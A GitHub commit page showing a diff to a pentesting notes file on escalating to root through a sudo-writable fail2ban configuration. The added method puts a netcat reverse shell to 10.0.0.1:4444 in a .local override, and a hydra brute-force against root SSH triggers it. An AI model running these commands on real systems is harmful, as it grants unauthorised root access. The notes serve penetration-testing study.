Merge pull request #198 from Old1337/patch-1

added another method to escalate privileges when having write permission ov…
hideckies · Sep 16, 2024 · 8a3cc6a · 8a3cc6a
2 parents 78a6023 + fe5173e
commit 8a3cc6a
Showing 1 changed file with 19 additions and 1 deletion.
diff --git a/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md b/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md
@@ -66,6 +66,9 @@ Specifically, insert a payload to one of the following values.
 - **actionunban**
 
 Here update the value of **actionban** which triggers ban on multiple login attempts.  
+
+Method 1
+
 Copy  **iptables-multiport.conf** to the current user's home directory.
 
 ```sh
@@ -91,6 +94,21 @@ Then move back the config file to the original one.
 mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
 ```
 
+Method 2
+
+Fail2ban parses .local files in the action.d directory after the .conf files, and any settings in the .local files override user changes made in the .conf files.
+
+```sh
+# cp iptables-multiport.conf in the same directory with .local extension iptables-multiport.local
+cp /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.local
+```
+
+We insert a reverse shell payload into the **actionban**.
+
+```sh
+actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
+```
+
 To apply the new configuration, restart it as root.
 
 ```sh
@@ -112,4 +130,4 @@ So that to, **hydra** is useful.
 hydra -l root -P passwords.txt <target-ip> ssh
 ```
 
-After a short time, you will get a root shell via listener.
+After a short time, you will get a root shell via listener.